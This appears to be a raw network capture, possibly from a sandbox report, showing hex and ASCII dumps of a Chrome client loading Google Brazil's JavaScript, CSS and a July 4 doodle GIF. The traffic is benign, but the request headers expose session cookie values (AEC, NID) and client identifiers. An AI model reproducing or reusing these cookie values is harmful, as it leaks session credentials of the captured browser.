75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 20 6b 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 Data Ascii: ange",P,!0);O(0);w&&(google.c.oil=na,A(document.documentElement,"load",J,!0),A(document.documentElement,"error",J,!0));google.cv=function(a,b,c,d){if(!a\|\|!b&&da(a))return 0;if(!a.getBoundingClientRect)return 1;var e=function(k){return k.getBoundingClientR
2024-07-04 17:43:03 UTC	224	IN	Data Raw: 64 61 0d 0a 72 28 61 5b 31 5d 29 3a 2d 31 7d 0a 66 75 6e 63 74 69 6f 6e 20 54 28 61 29 7b 76 61 72 20 62 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 2c 63 3d 62 2e 6d 3b 69 66 28 21 63 7c 7c 21 63 2e 70 72 73 29 7b 63 3d 77 69 6e 64 6f 77 2e 5f 63 73 63 3d 3d 3d 22 61 67 73 61 22 26 26 77 69 6e 64 6f 77 2e 5f 63 73 68 69 64 3b 76 61 72 20 64 3d 52 28 29 7c 7c 63 3f 30 3a 53 28 22 71 73 75 62 74 73 22 29 3b 64 3e 30 26 26 28 63 3d 53 28 22 66 62 74 73 22 29 2c 63 3e 30 26 26 28 62 2e 74 2e 73 74 61 72 74 3d 4d 61 74 68 2e 6d 61 78 28 64 2c 63 29 29 29 3b 76 61 72 20 65 3d 62 2e 74 2c 6b 3d 65 2e 73 74 61 72 74 3b 63 3d 7b 7d 3b 62 2e 77 73 72 74 0d 0a Data Ascii: dar(a[1]):-1}function T(a){var b=google.timers.load,c=b.m;if(!c\|\|!c.prs){c=window._csc==="agsa"&&window._cshid;var d=R()\|\|c?0:S("qsubts");d>0&&(c=S("fbts"),c>0&&(b.t.start=Math.max(d,c)));var e=b.t,k=e.start;c={};b.wsrt
2024-07-04 17:43:03 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 21 3d 3d 76 6f 69 64 20 30 26 26 28 63 2e 77 73 72 74 3d 62 2e 77 73 72 74 29 3b 69 66 28 6b 29 66 6f 72 28 76 61 72 20 6d 3d 30 2c 6e 3b 6e 3d 71 61 5b 6d 2b 2b 5d 3b 29 7b 76 61 72 20 68 3d 65 5b 6e 5d 3b 68 26 26 28 63 5b 6e 5d 3d 4d 61 74 68 2e 6d 61 78 28 68 2d 6b 2c 30 29 29 7d 64 3e 30 26 26 28 63 2e 67 73 61 73 72 74 3d 62 2e 74 2e 73 74 61 72 74 2d 64 29 3b 62 3d 62 2e 65 3b 61 3d 22 2f 67 65 6e 5f 32 30 34 3f 73 3d 22 2b 67 6f 6f 67 6c 65 2e 73 6e 2b 22 26 74 3d 22 2b 61 2b 22 26 61 74 79 70 3d 63 73 69 26 65 69 3d 22 2b 67 6f 6f 67 6c 65 2e 6b 45 49 2b 22 26 72 74 3d 22 3b 64 3d 22 22 3b 66 6f 72 28 76 61 72 20 66 20 69 6e 20 63 29 61 2b 3d 22 22 2b 64 2b 66 2b 22 2e 22 2b 63 5b 66 5d 2c 64 3d 22 2c 22 3b 66 6f 72 28 76 61 72 Data Ascii: 8000!==void 0&&(c.wsrt=b.wsrt);if(k)for(var m=0,n;n=qa[m++];){var h=e[n];h&&(c[n]=Math.max(h-k,0))}d>0&&(c.gsasrt=b.t.start-d);b=b.e;a="/gen_204?s="+google.sn+"&t="+a+"&atyp=csi&ei="+google.kEI+"&rt=";d="";for(var f in c)a+=""+d+f+"."+c[f],d=",";for(var
2024-07-04 17:43:03 UTC	1390	IN	Data Raw: 68 41 46 54 45 6e 64 22 2c 7b 73 74 61 72 74 54 69 6d 65 3a 61 7d 29 29 29 7d 7d 3b 76 61 72 20 75 61 3d 21 31 2c 58 3d 30 2c 59 3d 30 2c 5a 3b 66 75 6e 63 74 69 6f 6e 20 76 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 67 6f 6f 67 6c 65 2e 63 2e 77 68 2c 64 3d 21 62 3b 62 3d 62 3f 4d 61 74 68 2e 66 6c 6f 6f 72 28 62 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2e 74 6f 70 2b 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 29 3a 2d 31 3b 21 59 26 26 28 64 7c 7c 62 3e 3d 63 29 26 26 28 59 3d 61 2c 58 3d 62 29 3b 69 66 28 59 29 7b 76 61 72 20 65 3d 30 2c 6b 3d 30 2c 6d 3d 30 2c 6e 3d 21 31 3b 56 28 66 75 6e 63 74 69 6f 6e 28 68 29 7b 69 66 28 21 28 45 28 68 29 26 31 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 68 2e 41 29 72 65 74 75 Data Ascii: hAFTEnd",{startTime:a})))}};var ua=!1,X=0,Y=0,Z;function va(a,b){var c=google.c.wh,d=!b;b=b?Math.floor(b.getBoundingClientRect().top+window.pageYOffset):-1;!Y&&(d\|\|b>=c)&&(Y=a,X=b);if(Y){var e=0,k=0,m=0,n=!1;V(function(h){if(!(E(h)&1))return!1;if(h.A)retu
2024-07-04 17:43:03 UTC	1390	IN	Data Raw: 69 6f 6e 28 29 7b 56 28 62 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 63 29 7d 28 30 29 2c 77 61 3d 21 30 29 7d 3b 67 6f 6f 67 6c 65 2e 63 2e 75 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 69 66 28 21 77 7c 7c 76 29 67 6f 6f 67 6c 65 2e 63 2e 73 65 74 75 70 3d 78 61 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 67 6f 6f 67 6c 65 2e 64 72 63 2e 73 68 69 66 74 28 29 3b 61 3b 29 61 28 29 2c 61 3d 67 6f 6f 67 6c 65 2e 64 72 63 2e 73 68 69 66 74 28 29 7d 3b 67 6f 6f 67 6c 65 2e 64 72 63 3d 5b 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 74 69 63 6b 26 26 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 22 64 63 6c 22 29 7d 5d 3b 67 6f 6f 67 Data Ascii: ion(){V(b,function(){},c)}(0),wa=!0)};google.c.ub=function(){};if(!w\|\|v)google.c.setup=xa;}).call(this);(function(){function b(){for(var a=google.drc.shift();a;)a(),a=google.drc.shift()};google.drc=[function(){google.tick&&google.tick("load","dcl")}];goog

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:04 UTC	1627	OUT	GET /xjs/_/ss/k=xjs.hd.uXKqy-U68Tg.L.B1.O/am=AEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA/d=1/ed=1/br=1/rs=ACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1 Host: www.google.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:04 UTC	809	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/css; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 2429 Date: Thu, 04 Jul 2024 17:43:04 GMT Expires: Fri, 04 Jul 2025 17:43:04 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Wed, 03 Jul 2024 22:17:06 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-04 17:43:04 UTC	581	IN	Data Raw: 3a 72 6f 6f 74 7b 2d 2d 43 4f 45 6d 59 3a 23 32 30 32 31 32 34 3b 2d 2d 78 68 55 47 77 63 3a 23 66 66 66 7d 3a 72 6f 6f 74 7b 2d 2d 67 53 35 6a 58 62 3a 23 64 61 64 63 65 30 3b 2d 2d 41 71 6e 37 78 64 3a 23 64 32 64 32 64 32 3b 2d 2d 45 70 46 4e 57 3a 23 66 66 66 3b 2d 2d 49 58 6f 78 55 65 3a 23 37 30 37 35 37 61 3b 2d 2d 62 62 51 78 41 62 3a 23 34 64 35 31 35 36 3b 2d 2d 59 4c 4e 4e 48 63 3a 23 32 30 32 31 32 34 3b 2d 2d 54 4d 59 53 39 3a 23 31 61 37 33 65 38 3b 2d 2d 4a 4b 71 78 32 3a 23 31 61 30 64 61 62 3b 2d 2d 72 72 4a 4a 55 63 3a 23 31 61 37 33 65 38 3b 2d 2d 6d 58 5a 6b 71 63 3a 23 64 61 64 63 65 30 3b 2d 2d 4e 73 6d 30 63 65 3a 23 34 32 38 35 66 34 3b 2d 2d 58 4b 4d 44 78 63 3a 23 66 37 66 38 66 39 3b 2d 2d 61 59 6e 32 53 3a 23 65 63 65 64 65 65 Data Ascii: :root{--COEmY:#202124;--xhUGwc:#fff}:root{--gS5jXb:#dadce0;--Aqn7xd:#d2d2d2;--EpFNW:#fff;--IXoxUe:#70757a;--bbQxAb:#4d5156;--YLNNHc:#202124;--TMYS9:#1a73e8;--JKqx2:#1a0dab;--rrJJUc:#1a73e8;--mXZkqc:#dadce0;--Nsm0ce:#4285f4;--XKMDxc:#f7f8f9;--aYn2S:#ecedee
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 74 73 3a 6e 6f 6e 65 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 30 25 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 67 2d 73 6e 61 63 6b 62 61 72 2d 68 69 64 65 7b 66 72 6f 6d 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 30 25 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 67 2d 73 6e 61 63 6b 62 61 72 2d 73 68 6f 77 2d 63 6f 6e 74 65 6e 74 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 67 2d 73 6e 61 63 6b 62 61 72 2d 68 69 64 65 2d 63 6f 6e 74 65 6e 74 7b 74 6f 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 2e 4c 48 Data Ascii: ts:none;transform:translateY(0)}to{transform:translateY(-100%)}}@keyframes g-snackbar-hide{from{transform:translateY(-100%)}to{transform:translateY(0)}}@keyframes g-snackbar-show-content{from{opacity:0}}@keyframes g-snackbar-hide-content{to{opacity:0}}.LH
2024-07-04 17:43:04 UTC	77	IN	Data Raw: 2d 6c 65 66 74 3a 30 7d 2e 6a 68 5a 76 6f 64 7b 6c 65 66 74 3a 31 36 70 78 3b 72 69 67 68 74 3a 61 75 74 6f 7d 2e 4c 48 33 77 47 2c 2e 4f 78 38 43 79 64 7b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 79 4b 36 6a 71 65 2c 2e 57 Data Ascii: -left:0}.jhZvod{left:16px;right:auto}.LH3wG,.Ox8Cyd{left:0;right:0}.yK6jqe,.W
2024-07-04 17:43:04 UTC	381	IN	Data Raw: 75 30 76 39 62 2c 2e 45 37 48 64 67 62 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 47 39 6a 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 34 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 34 70 78 3b 6c 65 66 74 3a 2d 32 34 70 78 3b 72 69 67 68 74 3a 2d 32 34 70 78 7d 2e 41 42 4d 46 5a 2e 42 30 35 52 42 62 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 31 30 30 6d 73 2c 76 69 73 69 62 69 6c 69 74 79 20 30 73 20 30 73 3b 76 69 73 69 62 69 6c 69 74 79 3a 69 6e 68 65 72 69 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 36 29 7d 2e 41 42 4d 46 5a 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 Data Ascii: u0v9b,.E7Hdgb{position:relative}.G9jore{position:absolute;top:-24px;bottom:-24px;left:-24px;right:-24px}.ABMFZ.B05RBb{transition:background-color 100ms,visibility 0s 0s;visibility:inherit;background-color:rgba(0,0,0,0.6)}.ABMFZ{transition:background-color

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:04 UTC	1325	OUT	GET /logos/doodles/2024/fourth-of-july-2024-6753651837110246-law.gif HTTP/1.1 Host: www.google.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:04 UTC	660	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 198019 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 04 Jul 2024 04:43:46 GMT Expires: Fri, 04 Jul 2025 04:43:46 GMT Cache-Control: public, max-age=31536000 Last-Modified: Fri, 28 Jun 2024 21:43:37 GMT Content-Type: image/gif Age: 46758 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-04 17:43:04 UTC	730	IN	Data Raw: 47 49 46 38 39 61 f4 01 c8 00 f7 ff 00 29 62 54 32 29 79 31 49 94 8d b1 fa f9 b6 4b 64 84 ad c7 7b b4 20 2e 8f d9 ee ff 58 9f 32 9c 99 ad 68 92 ef 6a 89 ce ad 42 52 dc 52 38 dd 95 48 44 23 6d d2 71 6e b6 5a 84 38 6a d7 99 48 66 67 ba 45 ce cc f7 b0 cf f9 51 6c cc a5 85 39 54 86 fa b1 67 8f d0 53 49 46 7a ed 4c 24 50 fe d6 4a 39 6a ae ec 6b 46 6b 73 32 ce ce d9 2c 47 ad a8 50 6f b6 52 59 fc b0 8d 48 6b b3 94 7b 31 ce 63 5a 48 53 ad 39 94 9d f9 8f 66 4c 47 93 93 6b 8d f8 af 69 e7 ef ff f5 dc d4 96 8f ca 60 21 2d fc cd b4 ea ff ff 3a 73 e6 d7 9a 36 57 86 d6 91 38 58 f6 94 4c 30 2c 57 6c 72 b3 94 42 5a ff ef 5a a6 7b 38 b8 44 33 af b5 cb 5a 86 ed 33 28 68 6e 4a 87 6f b0 6f ff f0 da c6 bc dd b5 84 42 b6 67 76 76 a9 fd ad 84 40 75 2d 4e 6c 66 88 8e a5 d1 ea aa Data Ascii: GIF89a)bT2)y1IKd{ .X2hjBRR8HD#mqnZ8jHfgEQl9TgSIFzL$PJ9jkFks2,GPoRYHk{1cZHS9fLGki`!-:s6W8XL0,WlrBZZ{8D3Z3(hnJooBgvv@u-Nlf
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 73 b5 ff f4 6b 31 22 3b 42 f4 a1 44 52 1b 68 73 bd ff c3 93 25 9e 82 7e ad 50 40 c5 a3 49 86 61 a9 73 b5 f7 9c 84 1d bd a5 31 4d 88 fe ff ff ff 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 ff 0b 58 4d 50 20 44 61 74 61 58 4d 50 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 64 61 34 61 37 65 35 65 66 2c 20 32 30 32 32 2f 31 31 2f 32 32 2d 31 33 3a 35 30 3a 30 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 Data Ascii: sk1";BDRhs%~P@Ias1M!NETSCAPE2.0!XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 5f 24 3d 70 bb a0 dd 7c 10 b3 89 c3 b4 b0 26 e2 e1 19 8d fb 4d c2 e8 0f 12 e4 16 07 07 d2 84 20 4d 1c 04 c6 21 47 1c 03 c6 e1 c0 17 0d e8 a0 43 13 0f 36 d1 04 2f bc cc e3 01 6c b2 b9 16 85 6e ef 8d e7 e1 87 10 69 22 44 67 90 5d a6 9d 73 d7 79 21 91 26 c7 b0 06 41 14 54 bc 50 c5 8c 11 d4 58 a3 1b 73 58 51 8b 1c 01 4a 73 60 8f 08 86 60 c5 2d 0d 50 50 24 05 48 96 51 06 15 4c 62 11 c5 6c ae 35 e7 c5 08 20 56 69 e5 5e 81 68 a1 5e 00 28 ba a6 c7 97 5f 0a 80 42 0e bb 0c b0 cd 2e d1 11 31 0c 5d c3 44 b1 1a 04 1e 3c 82 a0 1c 3c 06 18 87 80 08 1a 38 20 8f 02 0a 78 60 08 42 5a 11 8b 1b 5b 6c d1 c0 a1 88 26 6a e8 a1 11 da 87 61 00 3d 74 68 e5 a4 bd 69 a2 c0 31 cc 35 c7 a5 6b 2e b8 b0 42 0f 52 0c 20 ea a8 03 5c 73 cd 36 db f4 c0 e5 67 0e 09 d1 e2 9b 65 00 ff 9a 67 9f Data Ascii: _$=p\|&M M!GC6/lni"Dg]sy!&ATPXsXQJs``-PP$HQLbl5 Vi^h^(_B.1]D<<8 x`BZ[l&ja=thi15k.BR \s6geg
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 7d ec 53 53 eb 5c a8 4e 55 12 24 08 80 0b 3a 9b d9 ae 86 f5 c2 c7 e4 6c 47 21 35 90 b8 71 69 10 6a 21 2f 35 50 da 0f e9 12 f1 71 33 c5 13 d6 c6 b9 a7 79 85 00 51 b6 95 64 80 ec db 80 47 f4 89 b7 5b 50 c1 8a 43 00 0f 37 34 c1 39 5d 14 30 71 99 91 1a d6 18 a2 1a 7b 60 ea 2b 9b eb 54 83 ae b5 1c dd c4 c3 5a a1 fb 5c a9 42 58 0f 2e e8 6a 75 3f bb e5 62 66 57 ac 60 76 86 33 18 b0 88 de 09 44 1c 45 58 8d 17 3a e4 8d 61 b0 55 ff 1b 52 38 c0 e1 7c d4 c4 73 36 51 89 75 4d b1 34 56 e1 80 b7 1a 30 be 88 e2 00 af 5a 3c d3 38 cc 21 0c 00 16 b2 61 91 90 a9 d5 44 61 05 6b 2c 68 2d d9 8a cb 05 6b 03 0f 78 58 82 94 61 e9 60 e7 0e c1 97 13 e6 b2 32 bf 2a d6 2f 8b d9 19 60 60 01 0b 52 ad 6a 30 2c e2 15 1a 23 df 6a 86 01 9e 36 93 b8 1f bd 94 8d 80 98 27 5b b8 ee b8 b5 7c 92 Data Ascii: }SS\NU$:lG!5qij!/5Pq3yQdG[PC749]0q{`+TZ\BX.ju?bfW`v3DEX:aUR8\|s6QuM4V0Z<8!aDak,h-kxXa`2*/``Rj0,#j6'[\|
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 9b f0 9c 80 07 4b 6b f5 91 98 76 52 7a d7 97 d4 a8 9c 06 c5 3f 1a 40 7d 9d 67 08 3d e0 82 e3 ff a8 93 37 f9 82 8b 70 0c 3a f0 23 72 20 03 05 e1 0d 4f 90 5a 86 53 7e e8 c7 44 b5 c2 7a ba a2 35 8f 40 27 2d 65 2b 51 99 8e 43 92 89 cc 03 28 0d 00 8a 5b f9 9a 56 e1 0e 81 60 1d ce 21 80 c9 90 09 04 30 8b b7 88 0d c0 d9 96 bf 19 9c 16 79 a1 12 19 0a 04 f0 00 ac 11 05 74 b7 60 78 b0 09 de 30 a2 de 20 0e 08 b0 0b 85 04 98 28 f7 04 4f a0 81 9b 66 8d 42 a7 05 03 25 59 ae 34 78 31 1a 7c d4 30 44 7a d0 03 67 d0 a3 90 a0 6a 68 70 06 62 70 06 95 20 a4 95 90 08 67 e0 73 68 f0 a3 68 d0 a4 ad b6 08 8b 90 94 89 b8 8e fe e0 0d bb f0 66 56 45 04 58 30 4f ec 15 84 77 62 05 ee 87 28 39 75 27 b5 60 02 5e 80 05 2e 30 1d 58 40 05 65 f0 02 2f a0 04 1b 50 06 14 20 a7 14 a0 04 01 b4 Data Ascii: KkvRz?@}g=7p:#r OZS~Dz5@'-e+QC([V`!0yt`x0 (OfB%Y4x1\|0Dzgjhpbp gshhfVEX0Owb(9u'`^.0X@e/P
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 3c d6 f5 cc 05 f8 ec 23 94 b0 ac cc ca ba 6b 15 9f 54 00 0f 2d e5 27 ba b0 03 0c b9 03 7c 0d 03 3b 10 02 b7 f0 44 d2 63 c9 b7 65 d7 b7 32 9a 2a c0 32 10 14 02 9e 58 ca 1a 4d 1e 76 c1 43 63 97 1a 68 c7 1e 9b 72 3e e6 52 30 48 b0 1a 34 80 0f bc 49 a1 c4 09 cc 12 29 c4 34 9d cb 35 5d d3 39 dd a8 6d f9 d2 b4 48 05 22 94 6e 8f b5 b0 c9 77 01 08 b0 09 4b 40 bf 93 06 98 29 07 08 3e 93 c5 1a f8 72 36 5a 23 92 a6 0d 90 1b 4b 1a 20 09 d0 b8 46 6c 84 01 2b 10 00 5e 2d d6 66 2d cf ef fc ce 61 3d d6 f0 7c ce e9 6c 0b f1 10 35 24 13 07 ba ff 90 ae 19 3c 65 59 ea 03 2d 66 20 e7 c0 09 c1 10 c4 ea 1d c4 84 d0 02 95 dc 2f 98 f3 09 09 34 68 f2 a7 4e 80 a6 28 6e 40 20 57 fb d8 1e a1 18 8b a1 1c 26 d2 1c af 70 8a 98 7d 1d 3c 00 38 cc d0 22 af d0 05 3c 2c b6 db 4b 91 31 7d da Data Ascii: <#kT-'\|;Dce2*2XMvCchr>R0H4I)45]9mH"nwK@)>r6Z#K Fl+^-f-a=\|l5$<eY-f /4hN(n@ W&p}<8"<,K1}
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 4a 0b 2d 49 4b 40 63 c7 33 7c 60 69 6a 35 d7 c2 14 00 01 71 66 a3 c6 39 dc 6c eb 67 0f 43 0c 29 cc 85 15 06 91 42 12 3a 35 18 47 83 34 f3 44 73 05 43 08 ba 4e 22 51 2a 48 c0 0f 3f 9a 49 40 3c 86 14 12 ff cf 08 00 a0 81 40 c8 16 a4 b2 21 07 0d 4a 12 08 02 0a d0 f9 45 1e fc ee 8b 84 a6 9a 22 80 61 a6 fd 7e 6a c0 01 2b ac 70 43 85 4f 5a fd 84 03 0e dc 38 ca 28 39 1e 71 e0 d6 5b 39 b8 a5 a6 57 20 20 82 44 60 83 15 36 2b 77 dc b1 20 90 19 66 18 64 59 66 5d 50 f1 59 68 a3 6d ca 85 1e 92 9d 21 10 0b 2c 60 c6 9f 0b 2f d4 4a 9c 19 0a e3 25 ad 5b e3 80 67 28 b7 6e 9c b1 2f c0 d4 0d 92 af 77 39 82 87 41 bb 76 84 a0 c2 00 52 39 f2 31 c5 96 ec d7 31 c5 9e bc 8c 32 82 31 c3 ac 11 76 0e a1 25 83 43 b6 cc 00 0a c7 52 b1 32 83 31 2e 81 40 0f 30 c5 6c 0d 90 4d 3a a1 2d 4f Data Ascii: J-IK@c3\|`ij5qf9lgC)B:5G4DsCN"Q*H?I@<@!JE"a~j+pCOZ8(9q[9W D`6+w fdYf]PYhm!,`/J%[g(n/w9AvR91121v%CR21.@0lM:-O
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 5a 3d 20 02 04 7c 00 3a 21 9e 35 ac d6 14 6b 59 ed ac b9 0d 78 c0 03 2f 48 5d 9f ff 45 ce 0f 44 89 10 5b c2 07 21 32 c3 19 cf d8 35 03 6b 20 c0 1a d6 80 60 d0 2c b8 c1 ad 01 41 01 a6 6a 46 98 a5 89 c2 07 58 41 62 f5 44 d0 34 f5 43 8f 1f 0e c0 74 c2 c3 50 c9 02 72 19 40 5b 88 42 24 82 90 cc 6e f6 2e 21 70 1a 54 d8 43 12 6d 50 63 92 54 50 41 af 7d cd 63 60 fb da 26 9f f0 75 af 01 d4 93 62 27 5b d9 cb 9e 60 71 ad fc 6c b0 68 a2 57 2a 72 c1 99 a1 ab 54 e9 76 99 a9 5f b6 2e 4f 07 40 e6 9e 62 9b a7 0c 30 5d 85 3c a0 12 76 1d 51 9b ed 55 f7 7a af b9 2e f7 c2 8b 23 6a f5 c0 1f 90 34 45 7c e7 37 14 03 3b 44 c3 0e 81 0b 81 71 c6 df 4c 00 8d ff 25 2c 81 0b 78 6a e9 10 4c a0 83 2b 2a d4 9a 15 90 c1 13 85 68 e1 5f 5b a6 c6 3c 0d b6 d3 18 df 70 1a ed 38 6a d6 f4 e6 7b Data Ascii: Z= \|:!5kYx/H]ED[!25k 